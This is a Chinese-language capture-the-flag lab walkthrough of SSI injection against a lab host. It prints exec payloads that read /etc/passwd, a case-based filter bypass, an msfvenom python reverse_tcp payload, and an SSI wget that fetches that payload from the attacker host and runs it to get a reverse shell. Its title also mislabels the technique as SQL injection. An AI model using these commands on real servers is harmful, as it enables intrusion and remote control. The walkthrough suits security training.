CTF—攻防练习之HTTP—SQL注入(SSI注入)

主机：192.168.32.152

靶机：192.168.32.161

ssI是赋予html静态页面的动态效果，通过ssi执行命令，返回对应的结果，若在网站目录中发现了.stm .shtm .shtml等，且对应SSL输入没有过滤
该网站可能存在SSI注入漏洞

ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式，看看能不能运行系统命令。

如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> 

切换目录<!--#exec cmd="cd /root/dir/" -->

 

 nmap，nikto 分析，发现可能存在SSI注入，

dirb 看看目录

index目录下，有个SSi语句

 SSI目录下看到应该是和命令注入有关

通过robots.txt目录挖掘到站点的根目录

打开网页找一个注入点，测试后，在这里找到，发现有过滤，大小写可绕过，网页给出的测试命名少了个!符号，加上测试成功

 

 此时我们就可以尝试生成一个python shell 上传到网站服务器根目录上，再执行反弹监听

 msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
在打开msfconsole监听

此时再将生成的pyshell上传至web根目录（/var/www/html），再打开apache服务器

 

在开启apache服务器，查看状态

再将pyshell下载到站点上<!--#exec cmd="wget http://192.168.32.152/pyshell.py"-->

再提权

<!--#exec cmd="chmod 777 pyshell.py" -->

 然后启动python pyshell.py,成功反弹shell！

 

随后，进入shell，优化终端，可以进入root目录